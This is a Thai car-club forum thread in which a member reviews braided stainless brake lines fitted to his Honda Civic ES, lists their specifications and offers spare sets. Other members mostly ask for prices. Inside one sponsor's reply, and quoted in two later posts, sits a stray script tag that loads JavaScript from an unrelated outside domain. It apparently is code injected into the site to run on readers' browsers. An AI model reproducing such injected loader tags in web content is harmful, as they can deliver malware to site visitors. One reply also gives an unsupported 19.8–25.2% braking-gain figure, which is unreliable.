ตอบ
focusyo


ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ที่อยู่: Chonburi
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 เมษา 2012 06:44 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สายอ่อนเบรก
สายอ่อนเบรกมีบทบาทอย่างไร ทำไมพวกรถแข่งชอบเปลี่ยนสายอ่อนเบรกเป็นแบบสายถัก อันนี้หลายคนเปลี่ยนแล้วยังไม่เข้าใจว่าเปลี่ยนเพื่ออะไร หรือว่ามันแพงแล้วต้องดี หรือว่ามีความคงทนมากกว่า หรือว่าสีสันที่สวยงาม ส่วนใหญ่เห็นเค้าเปลี่ยนกันเลยเปลี่ยนบ้าง อันนี้ต้องบอกเลยว่า ที่เปลี่ยนกันจุดประสงค์ไม่ได้เป็นอย่างที่กล่าวมาแล้วทั้งสิ้น
การเปลี่ยนสายอ่อนเบรกในรถแข่ง เพื่อให้เกิดการเที่ยงตรงและแน่นอนในการเบรก ให้มั่นใจว่าเบรกทั้งสี่ล้อได้รับแรงดันน้ำมันเบรกที่เท่าเทียมกัน การเบรกแบบรุนแรงจะสามารถบังคับรถได้ดีกว่า และหยุดรถได้ระยะทางที่สั้นกว่า

ทำไม
คำตอบง่ายๆครับ เนื่องจากสายอ่อนเบรกของรถเดิมๆ จะมีลักษณะเป็นท่อยางซึ่งสามารถยืดหยุ่นได้ตามแรงดัน ถึงแม้จะเป็นท่อที่ทนต่อแรงดันสูงก็ตาม เนื่องจากวัสดุที่ใช้ทำก็คือยาง ส่วนสายถักยี่ห้อต่างๆจะทำมาจาก โพลิเมอร์และถูกห่อหุ้มด้วยแสตนเลสถัก เพื่อป้องกันการเสียดสีและการขยายตัวของตัวท่อเอง เมื่อไม่มีการขยายตัวของสาย การควบคุมแรงดันก็จะเท่ากันทั้งสี่ล้อ หรือตามที่กำหนดโดยไม่สูญเสียแรงดันไปกับการขยายตัวของท่อยาง

สเปกสาย
สายนำเข้ามาจากอิตาลี
ทนอุณหภูมิ ได้ -60C + 260C
ทนแรงดันได้ 200Bar , 3000PSI
ดูข้อมูลประกอบครับ


ติดตั้งเรียบใส่กับเบรค EP3 จาน 300
ขันน๊อตใส่ได้เลยครับ
ติดตั้งเรียบใส่กับเบรค EP3 จาน 300
ขันน๊อตใส่ได้เลยครับ
ติดตั้งเรียบใส่กับ คาลิเปอร์เดิมด้านหลัง
ติดตั้งเรียบใส่กับ คาลิเปอร์เดิมด้านหลัง
ขันน๊อตใส่ได้เลยครับ
ขันน๊อตใส่ได้เลยครับ
สเปกสายที่ใช้ทำสายเบรคครับ ของอิตาลี
สเปกสายที่ใช้ทำสายเบรคครับ ของอิตาลี
Attached File :
รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 10 พฤษภาคม 2012 22:11, ทั้งหมด 4 ครั้ง (ดูทั้งหมด)
bandai_join


เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 11 เมษา 2012 07:30 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
เท่จัง ทำให้นึกถึงมอโซด์ของแว๊นรุ่นเก่าๆ อิอิ ทำมาเท่าไหร่อ่ะครับ
ได้รับคำขอบคุณจาก: focusyo 
es330


เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 11 เมษา 2012 07:32 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ขอบคุณครับ ว่าแต่ราคาเท่าไร
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  focusyo 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 11 เมษา 2012 07:52 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
bandai_join พิมพ์ว่า:
เท่จัง ทำให้นึกถึงมอโซด์ของแว๊นรุ่นเก่าๆ อิอิ ทำมาเท่าไหร่อ่ะครับ



es330 พิมพ์ว่า:
ขอบคุณครับ ว่าแต่ราคาเท่าไร




อยากจะรู้นัก<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: focusyo 
nismo


ชื่อเล่น: บอล

เข้าร่วม: 30 มิถุนา 2011
ตอบ: 291

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 552

ที่อยู่: โคราช - ม.ขอนแก่น
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 11 เมษา 2012 07:53 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยดีครับ ถ้าสีฉูดฉาดมากกว่านี้แหล่มเลย

ได้รับคำขอบคุณจาก: focusyo 
narudon


ชื่อเล่น: หนุ่ย

เข้าร่วม: 29 เมษา 2010
ตอบ: 1380

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 368

ที่อยู่: ชลบุรี
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 11 เมษา 2012 08:17 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
หาของเล่นใหม่ๆ..มาตลอดเลยนะพี่..
ได้รับคำขอบคุณจาก: focusyo 
deo20


เข้าร่วม: 16 ธันวา 2010
ตอบ: 970

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 107

ที่อยู่: ฉะเชิงเทรา
พุธ, 11 เมษา 2012 08:37 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
น่าจะมีสีให้เลือก หรือต้องไปหาปลอกหุ้มเอง

ขอราคาด้วยคน

ได้รับคำขอบคุณจาก: focusyo 
taey ll


ชื่อเล่น: เต้ย

เข้าร่วม: 19 ตุลา 2008
ตอบ: 454

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 248
ให้คำขอบคุณ: 549

ที่อยู่: Prachinburi
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 11 เมษา 2012 08:49 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยดี เบรคดีขึ้นอีกตั้งหาก
ได้รับคำขอบคุณจาก: focusyo 
Kriss_es04


ชื่อเล่น: อ๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1543
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
ปี: 2004
พุธ, 11 เมษา 2012 09:08 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สนใจครับ จับมาจากไหนครับ ราคาเท่าไรอ่ะ
ได้รับคำขอบคุณจาก: focusyo 
Chote


ชื่อเล่น: โจ่ว

เข้าร่วม: 27 พฤษภาคม 2011
ตอบ: 632

Guru ES
Guru ES

ได้รับคำขอบคุณ: 656
ให้คำขอบคุณ: 382

ที่อยู่: ลาดกระบังครับ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 เมษา 2012 09:27 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
มารอฟังราคาด้วยคน
ได้รับคำขอบคุณจาก: focusyo 
Sweetheart


เข้าร่วม: 23 กุมภา 2011
ตอบ: 165

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 379
ให้คำขอบคุณ: 56
พุธ, 11 เมษา 2012 09:53 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สงสัยว่า ทำไมสายถักถึงทำให้เบรคดีขึ้นละครับ (ในใจคิดว่าเป็นแค่ทางเดินน้ำมันเบรค ไม่น่าจะมีผล)
"<script src="https://sport32news.com/civicesgroup.js">  แต่สวยมว๊าก
ได้รับคำขอบคุณจาก: Nung_Sodapop  focusyo 
bomb3092


ชื่อเล่น: บอม

เข้าร่วม: 13 ตุลา 2011
ตอบ: 1116

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 957
ให้คำขอบคุณ: 1379

ที่อยู่: บางนา แบริ่ง ลาซาล
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 11 เมษา 2012 10:04 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยคับเท่าไรเอ่ย
ได้รับคำขอบคุณจาก: focusyo 
hisashi2524


ชื่อเล่น: ตั้ม

เข้าร่วม: 28 มิถุนา 2011
ตอบ: 1056

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 685
ให้คำขอบคุณ: 12

ที่อยู่: แถวเซียร์รังสิต
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 เมษา 2012 10:26 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยครับ
ได้รับคำขอบคุณจาก: focusyo 
focusyo


ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ที่อยู่: Chonburi
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 เมษา 2012 14:35 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ผมทำมา5ชุดใส้รถผม1ชุดเหลือ4ใครสนใจpmมาได้ครับราคาพิเศษไม่ขายเอากำไรขายเอาพวกดีกว่า
ได้รับคำขอบคุณจาก: hikaru_kung  brunox  Kriss_es04  Makai 
a_ten


ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ที่อยู่: kanchanaburi
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 11 เมษา 2012 16:02 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
เหมือนของมอไซค์เลยคับ
หล่อๆ
ได้รับคำขอบคุณจาก: focusyo 
Nung_Sodapop


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

ที่อยู่: ลาดกระบัง
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 12 เมษา 2012 08:59 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
Sweetheart พิมพ์ว่า:
สงสัยว่า ทำไมสายถักถึงทำให้เบรคดีขึ้นละครับ (ในใจคิดว่าเป็นแค่ทางเดินน้ำมันเบรค ไม่น่าจะมีผล)
"<script src="https://sport32news.com/civicesgroup.js">  แต่สวยมว๊าก



+1
ได้รับคำขอบคุณจาก: focusyo 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 12 เมษา 2012 09:40 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
focusyo พิมพ์ว่า:
ผมทำมา5ชุดใส้รถผม1ชุดเหลือ4ใครสนใจpmมาได้ครับราคาพิเศษไม่ขายเอากำไรขายเอาพวกดีกว่า


ขอราคาครับ
ได้รับคำขอบคุณจาก: focusyo 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 12 เมษา 2012 09:49 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
Sweetheart พิมพ์ว่า:
สงสัยว่า ทำไมสายถักถึงทำให้เบรคดีขึ้นละครับ (ในใจคิดว่าเป็นแค่ทางเดินน้ำมันเบรค ไม่น่าจะมีผล)
"<script src="https://sport32news.com/civicesgroup.js">  แต่สวยมว๊าก




มีผลดี 19.8%ถึง25.2% เลยครับ เนื่องจากเนื้อยางของสายเบรคเดิมเป็นยางผสมคาบ่อน ยืดยุ่นสูงในช่วงเวลาการเหยียบเบรคนั้นน้ำมันเบรคจะถูกยืดยุ่นออกมาจากสาย ลองนึกภาพตามนะ มันจะบวมแล้วน้ำมันเบรคก็จะดันลงเยอะ ในช่วงขณะการเหยียบเบรคนั้นในสายโลหะหรืออลูมินั่มนั้นจะไม่มีการยืดยุ่นเลย ทำให้การตอบสนองในการเบรคจะดีขึ้นเพราะน้ำมันเบรคไม่ถูกดันเยอะ

ถามว่าแล้วทำไมผู้ผลิตไม่เลือกใช้สายโลหะหรืออลูมินั่มมาเลยละ

ตอบแทนผู้ผลิตเลยนะ สายยางผสมคาบ่อนนั้น ทนและไม่ต้องบำรุงรักษาบ่อย อายุการใช้งานเยอะกว่า และมีประสิทธิภาพเรื่องการรั่วซึมดีกว่า เพราะบางคนบอกตรงๆๆใช้รถมา10ปีหรือมากกว่านั้น ถามหน่อยเคยเปลี่ยนสายเบรคมั่งป่าวเถอะ


ถามเจ้าของกระทู้ หรือถามพวกทำรถซิ่ง ทำไมต้องใช้สายโลหะหรืออลูมินั่ม

ตอบโดยใช้หลักการนะ ประสิทธิภาพในการเบรค ซึ่งในความเร็ว120-200 มันคุ้มมั้นที่จะมีการบำรุงรักษาสายเบรค หรือ ต้องคอยเช็คนั่วอยู่บ่อยๆๆ ถามผมนะ 6เดือนเปลี่ยนผมก็ยอม แลกกับการตอบสนองในกรณีที่เบรคกระทันหัน โดยปกติคนส่วนใหญ่สมัยนี้ ขับรถทางไกลๆๆผมเชื่อ 100ละ10 ไม่มีใครขับต่ำกว่า 120ในทางตรงยาวหรอกครับ

ข้อมูลนี้ มีหลักการเชิงวิทยาศาสตร์และวิศวกรรมศาสตร์ ครับไม่ได้ผูดมาลอยๆๆและก็มิได้สนับสนุนขายอุปกรณ์ใดๆๆทั้งสิ้นครับ
ได้รับคำขอบคุณจาก: Saka  hikaru_kung  ae  scanclub  brunox  focusyo  Makai   
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 12 เมษา 2012 09:53 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
Sweetheart พิมพ์ว่า:
สงสัยว่า ทำไมสายถักถึงทำให้เบรคดีขึ้นละครับ (ในใจคิดว่าเป็นแค่ทางเดินน้ำมันเบรค ไม่น่าจะมีผล)
"<script src="https://sport32news.com/civicesgroup.js">  แต่สวยมว๊าก




มีผลดี 19.8%ถึง25.2% เลยครับ เนื่องจากเนื้อยางของสายเบรคเดิมเป็นยางผสมคาบ่อน ยืดยุ่นสูงในช่วงเวลาการเหยียบเบรคนั้นน้ำมันเบรคจะถูกยืดยุ่นออกมาจากสาย ลองนึกภาพตามนะ มันจะบวมแล้วน้ำมันเบรคก็จะดันลงเยอะ ในช่วงขณะการเหยียบเบรคนั้นในสายโลหะหรืออลูมินั่มนั้นจะไม่มีการยืดยุ่นเลย ทำให้การตอบสนองในการเบรคจะดีขึ้นเพราะน้ำมันเบรคไม่ถูกดันเยอะ

ถามว่าแล้วทำไมผู้ผลิตไม่เลือกใช้สายโลหะหรืออลูมินั่มมาเลยละ

ตอบแทนผู้ผลิตเลยนะ สายยางผสมคาบ่อนนั้น ทนและไม่ต้องบำรุงรักษาบ่อย อายุการใช้งานเยอะกว่า และมีประสิทธิภาพเรื่องการรั่วซึมดีกว่า เพราะบางคนบอกตรงๆๆใช้รถมา10ปีหรือมากกว่านั้น ถามหน่อยเคยเปลี่ยนสายเบรคมั่งป่าวเถอะ


ถามเจ้าของกระทู้ หรือถามพวกทำรถซิ่ง ทำไมต้องใช้สายโลหะหรืออลูมินั่ม

ตอบโดยใช้หลักการนะ ประสิทธิภาพในการเบรค ซึ่งในความเร็ว120-200 มันคุ้มมั้นที่จะมีการบำรุงรักษาสายเบรค หรือ ต้องคอยเช็คนั่วอยู่บ่อยๆๆ ถามผมนะ 6เดือนเปลี่ยนผมก็ยอม แลกกับการตอบสนองในกรณีที่เบรคกระทันหัน โดยปกติคนส่วนใหญ่สมัยนี้ ขับรถทางไกลๆๆผมเชื่อ 100ละ10 ไม่มีใครขับต่ำกว่า 120ในทางตรงยาวหรอกครับ

ข้อมูลนี้ มีหลักการเชิงวิทยาศาสตร์และวิศวกรรมศาสตร์ ครับไม่ได้ผูดมาลอยๆๆและก็มิได้สนับสนุนขายอุปกรณ์ใดๆๆทั้งสิ้นครับ
ได้รับคำขอบคุณจาก: Nung_Sodapop  Saka  focusyo  Makai  Tanadath 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
พฤหัส, 12 เมษา 2012 09:59 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ใส่ของ Brake Pro ไปละ เบรคดีขึ้นจรองๆสำหรับสายถัก
ได้รับคำขอบคุณจาก: focusyo 
scanclub


ชื่อเล่น: ไผ่

เข้าร่วม: 18 ตุลา 2009
ตอบ: 1250

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1113
ให้คำขอบคุณ: 2432

ที่อยู่: แปดริ้ว-พนมสารคาม-ปราจีนบุรี
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 12 เมษา 2012 16:18 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ว้าว งามหลาย พีเอ็มราคาหน่อยครับ
ได้รับคำขอบคุณจาก: focusyo 
itcentre


เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

ที่อยู่: Pattaya
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 12 เมษา 2012 17:30 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยดีครับ ว่าแต่ราคาเท่าไรหรือครับ
ได้รับคำขอบคุณจาก: focusyo 
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
พฤหัส, 12 เมษา 2012 17:31 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
สวยดีครับ
ได้รับคำขอบคุณจาก: focusyo 
focusyo


ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ที่อยู่: Chonburi
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 20 เมษา 2012 08:32 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
up ข้อมูลเพิ่มเติ่ม
maya


ชื่อเล่น: เมษ์

เข้าร่วม: 02 ธันวา 2008
ตอบ: 349

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 324
ให้คำขอบคุณ: 607

ที่อยู่: จันทบุรี @ <ขลุง>®
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 20 เมษา 2012 09:31 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ของดี คุณภาพสูง  .................
siripong


เข้าร่วม: 02 กรกฎา 2009
ตอบ: 3024

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 930
ให้คำขอบคุณ: 3457

ที่อยู่: BLUE ZONE
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 20 เมษา 2012 10:00 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ข้อมูลดีๆทั้งนั้นครับ พี่คนนี้
พี่โย อีเอส ชลบุรี
atommic


เข้าร่วม: 19 มกรา 2010
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 2

ที่อยู่: BKK
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 20 เมษา 2012 10:12 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
ราคาเท่าไรคับ
kittidech


ชื่อเล่น: กิต คร้าบ

เข้าร่วม: 06 กรกฎา 2009
ตอบ: 2334

Moderator
Moderator

ได้รับคำขอบคุณ: 2835
ให้คำขอบคุณ: 15110

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 20 เมษา 2012 10:15 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
เพิ่งเหนอยากใส่อ่ะพี่โย pm ให้ผมมั่งค้าบ
focusyo


ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ที่อยู่: Chonburi
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 11 พฤษภาคม 2012 08:08 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
nismo พิมพ์ว่า:
สวยดีครับ ถ้าสีฉูดฉาดมากกว่านี้แหล่มเลย


ปรับปรุงมาให้แล้วครับ
top_es


เข้าร่วม: 01 กุมภา 2010
ตอบ: 842

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 40

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 11 พฤษภาคม 2012 09:08 - รีวิว เปลี่ยนสายเบรคถัก เนื่องจากมีสมาชิกถามมาเยอะว่าสายสเปกอะไร เอาข้อมูลมาเพิ่มเติม
focusyo พิมพ์ว่า:
สายอ่อนเบรก
สายอ่อนเบรกมีบทบาทอย่างไร ทำไมพวกรถแข่งชอบเปลี่ยนสายอ่อนเบรกเป็นแบบสายถัก อันนี้หลายคนเปลี่ยนแล้วยังไม่เข้าใจว่าเปลี่ยนเพื่ออะไร หรือว่ามันแพงแล้วต้องดี หรือว่ามีความคงทนมากกว่า หรือว่าสีสันที่สวยงาม ส่วนใหญ่เห็นเค้าเปลี่ยนกันเลยเปลี่ยนบ้าง อันนี้ต้องบอกเลยว่า ที่เปลี่ยนกันจุดประสงค์ไม่ได้เป็นอย่างที่กล่าวมาแล้วทั้งสิ้น
การเปลี่ยนสายอ่อนเบรกในรถแข่ง เพื่อให้เกิดการเที่ยงตรงและแน่นอนในการเบรก ให้มั่นใจว่าเบรกทั้งสี่ล้อได้รับแรงดันน้ำมันเบรกที่เท่าเทียมกัน การเบรกแบบรุนแรงจะสามารถบังคับรถได้ดีกว่า และหยุดรถได้ระยะทางที่สั้นกว่า

ทำไม
คำตอบง่ายๆครับ เนื่องจากสายอ่อนเบรกของรถเดิมๆ จะมีลักษณะเป็นท่อยางซึ่งสามารถยืดหยุ่นได้ตามแรงดัน ถึงแม้จะเป็นท่อที่ทนต่อแรงดันสูงก็ตาม เนื่องจากวัสดุที่ใช้ทำก็คือยาง ส่วนสายถักยี่ห้อต่างๆจะทำมาจาก โพลิเมอร์และถูกห่อหุ้มด้วยแสตนเลสถัก เพื่อป้องกันการเสียดสีและการขยายตัวของตัวท่อเอง เมื่อไม่มีการขยายตัวของสาย การควบคุมแรงดันก็จะเท่ากันทั้งสี่ล้อ หรือตามที่กำหนดโดยไม่สูญเสียแรงดันไปกับการขยายตัวของท่อยาง

สเปกสาย
สายนำเข้ามาจากอิตาลี
ทนอุณหภูมิ ได้ -60C + 260C
ทนแรงดันได้ 200Bar , 3000PSI
ดูข้อมูลประกอบครับ



สเปเซอร์แบบของพี่ ซื้อได้ที่ไหนหรอคับ  ราคาเท่าไร อยากได้มาก 

แล้วใส่แล้ววิ่งเร็วๆ ล้อสั่นไหมคับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.